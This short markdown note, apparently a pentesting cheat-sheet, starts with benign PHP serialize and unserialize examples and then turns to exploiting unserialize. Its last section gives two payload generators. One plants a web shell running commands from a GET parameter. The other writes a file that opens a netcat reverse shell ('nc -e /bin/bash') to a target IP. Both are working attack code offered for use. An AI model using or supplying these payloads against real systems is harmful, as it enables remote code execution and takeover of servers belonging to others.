# PHP (De-)Serialization

A basic example of (de-)serialization is the following

Serialize is show in the following snippet.

```php
<?php
$plain_text = array("title" => "Hello, World!", "content" => "Lore Ipsum Dolor");
$serialized = serialize($plain_text);
file_put_contents('serialized.txt', $serialized);
?>
```

Deserialize is done in the following snippet.

```php
<?php
$serialized = file_get_contents('serialized.txt');
$plain_text = unserialize($serialized);
echo "Title: " . $plain_text['title'];
echo "Content: " . $plain_text['content'];
?>
```

## Unserialize

* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)

Serialize a form on a website through PHP via

```php
<?php
class FormSubmit {
    public $form_file = 'messages.php';
    public $message = '<?php
    if(isset($_GET[\'cmd\']))
    {
        system($_GET[\'cmd\']);
    }
?>';
}

print urlencode(serialize(new FormSubmit));
?>
```

```php
<?php class file 
    { 
        public $file = 'rev.php'; public $data = '<?php shell_exec("nc -e /bin/bash $TARGET_IP 4455"); ?>'; 
    } 
    echo (serialize(new file)); 
?>
```